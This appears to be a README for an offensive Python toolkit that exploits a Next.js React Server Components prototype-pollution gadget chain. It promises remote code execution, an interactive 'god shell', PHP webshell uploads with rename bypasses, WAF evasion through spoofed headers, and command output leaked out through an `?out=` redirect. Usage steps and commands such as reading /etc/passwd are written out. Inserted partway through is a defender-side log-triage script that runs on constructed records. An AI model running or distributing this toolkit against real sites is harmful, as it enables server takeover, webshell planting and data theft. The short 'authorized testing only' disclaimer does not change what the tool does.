This Python toolkit exploits a Next.js React Server Components (RSC) prototype pollution + React.lazy(-1) gadget chain for full RCE, including an interactive "god shell", file upload (PHP webshell dropper), and exfiltration via `?out=`.

Automated detection and exploitation of vulnerable Next.js apps (e.g., target.com). Drops a uid=33(www-data) shell.
Features:
- RCE via `child_process.execSync` → `/exploit?out=UID`
- God Shell: interactive commands, file read (`read /etc/passwd`), uploads
- Bypass: junk KB padding, Unicode, Vercel/WAF tweaks
- Stealth: Base64 encoding, multipart RSC POST
- Detect: POST `{"0":null}` → `500 E{"digest` confirms the RSC handler
- Combos: test pollution + lazy payloads (junk=0/KB, uni, vercel) → `Location: /exploit?out=id_output`
- Exploit: `execSync(cmd)` → exfil stdout/stderr via redirect
- Shell: loop commands; `upload_txt local.txt remote.php` → write + rename bypass
- WAF: X-FF=127.0.0.1, Origin/Referer evade BitNinja/nginx
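From the defender's side, the indicators listed above (the `{"0":null}` probe answered with a 500, the `/exploit?out=` exfil path in a request or redirect, and a spoofed `X-Forwarded-For: 127.0.0.1`) are easy to triage out of request logs. This is an added example, not part of the toolkit; the JSON-lines log records it reads are constructed, and the field names are assumed.

```python
# Added example, not part of the toolkit: defender-side triage of JSON
# request logs for the indicators this README names. Records are constructed.
import json
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed JSON-lines log, one request per line (not real traffic).
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"src": "203.0.113.5", "method": "POST", "path": "/", "status": 500,
     "headers": {"content-type": "text/plain"}, "body": '{"0":null}'},
    {"src": "203.0.113.5", "method": "POST", "path": "/", "status": 303,
     "headers": {"content-type": "multipart/form-data; boundary=x",
                 "x-forwarded-for": "127.0.0.1"},
     "resp_headers": {"location": "/exploit?out=uid%3D33(www-data)"}},
    {"src": "203.0.113.5", "method": "GET",
     "path": "/exploit?out=uid%3D33(www-data)", "status": 404, "headers": {}},
    {"src": "198.51.100.7", "method": "GET", "path": "/about", "status": 200,
     "headers": {"x-forwarded-for": "198.51.100.7"}},
])

def exfil_param(url: str):
    """Return the decoded ?out= value if url is an /exploit?out= URL, else None."""
    parts = urlsplit(url)
    if not parts.path.startswith("/exploit"):
        return None
    return parse_qs(parts.query).get("out", [None])[0]

def classify(rec: dict) -> list:
    """Tag one log record with each README indicator it matches."""
    tags = []
    body = (rec.get("body") or "").strip()
    if rec["method"] == "POST" and rec["status"] == 500 and body.startswith('{"0":null}'):
        tags.append("rsc_probe")          # the toolkit's detection request
    hdrs = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    if hdrs.get("x-forwarded-for", "").strip() == "127.0.0.1" and rec["src"] != "127.0.0.1":
        tags.append("xff_spoof")          # loopback claimed by a remote client
    loc = rec.get("resp_headers", {}).get("location", "")
    if exfil_param(rec["path"]) is not None or exfil_param(loc) is not None:
        tags.append("exfil_out_param")    # command output carried in ?out=
    return tags

def triage(log_text: str) -> dict:
    """Group matched indicators by source address; an empty dict means clean."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        rec = json.loads(line)
        for tag in classify(rec):
            hits[rec["src"]].add(tag)
    return {src: sorted(tags) for src, tags in hits.items()}

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

A source that trips more than one tag in a short window is the strongest signal; a lone 500 on a POST is common noise and worth correlating before alerting.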
Usage:
```
pip3 install aiohttp
python3 main.py
```
- Enter target(s): `http://target.com` or `targets.txt`
- Mode: 1=Detect 2=PoC(id) 3=Custom 4=God Shell [4]
- Piped: `echo "http://target\n4" | python3 main.py`
God Shell Commands:
```
upload <local.php> <remote/shell.php>   # Direct PHP upload
upload_txt <local> <remote/shell.php>   # TXT→rename bypass
upload_bin <local> <remote>             # Binaries (chmod later)
help / exit
id / cat /etc/passwd / ls -la /var/www/
```
Output:
- Vulnerable: `React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt`
- Screenshots: Banner → `[VULNERABLE]` → `uid=33(www-data)`
Requirements: aiohttp
```
pip install aiohttp
```
For authorized penetration testing and educational purposes only (user confirmed permission under ToS). Unauthorized use is illegal and unethical.
Buy me a Coffee:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans

